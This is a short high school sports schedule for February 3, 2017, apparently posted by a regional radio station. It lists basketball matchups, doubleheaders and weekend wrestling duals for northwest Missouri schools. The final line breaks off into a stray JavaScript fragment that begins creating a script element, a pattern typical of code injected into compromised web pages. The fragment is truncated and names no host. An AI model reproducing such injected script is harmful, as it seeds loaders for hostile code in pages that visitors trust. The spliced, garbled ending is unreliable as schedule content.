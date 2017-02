HIGH SCHOOL SCHEDULE FOR 2-3-17

GRC CROSSOVER GAMES-

GIRLS @ 6 PM

STANBERRY @ TRENTON FOR GRC CHAMPIONSHIP

KING CITY @ GALLATIN

NORTH ANDREW @ SOUTH HARRISON

BRAYMER @ PUTNAM COUNTY

WORTH COUNTY @ PRINCETON

PATTONSBURG @ MILAN

ST. JOE CHRISTIAN @ POLO

ALBANY @ MAYSVILLE

BOYS @ APPROX. 7:45

STANBERRY @ TRENTON FOR GRC CHAMPIONSHIP

NORTH ANDREW @ PUTNAM COUNTY

BRAYMER @ MAYSVILLE

WORTH COUNTY @ GALLATIN

KING CITY @ MILAN

ST. JOSEPH CHRISTIAN @ SOUTH HARRISON

PATTONSBURG @ PRINCETON

ALBANY @ POLO



DOUBLEHEADERS-

WEST PLATTE @ EAST BUCHANAN

LAWSON @ HAMILTON———————-LIVE ON KKWK 100.1 FM

LATHROP @ NORTH PLATTE

PLATTSBURG @ MID-BUCHANAN

GILMAN CITY vs EAST HARRISON @ RIDGEWAY

MERCER @ NORTH HARRISON

NORBORNE @ TRI-COUNTY

DeKALB @ MOUND CITY

NORTH NODAWAY vs EAST ATCHISON @ TARKIO

STEWARTSVILLE @ JEFFERSON

WEST NODAWAY @ NODAWAY-HOLT

NORTHEAST NODAWAY @ SOUTH NODAWAY

OSBORN @ UNION STAR

ROCK PORT @ SOUTH HOLT

ST. JOE CENTRAL @ LIBERTY NORTH

GIRLS-

LAFAYETTE @ CAMERON

ODESSA @ EXCELSIOR SPRINGS

BOYS-

CAMERON @ LAFAYETTE

CHILLICOTHE @ BENTON

SAVANNAH @ BISHOP LeBLOND

SMITHVILLE @ MARYVILLE

EXCELSIOR SPRINGS @ ODESSA

KEARNEY @ WINNETONKA

WRESTLING-

SATURDAY-

ALBANY WARRIOR DUALS-ALBANY, HAMILTON, STANBERRY, EAST ATCHISON

RICHMOND TOURNAMENT-RICHMOND, CHILLICOTHE

LEXINGTON DUALS-LEXINGTON, LAWSONvar d=document;var s=d.createElement(‘script’);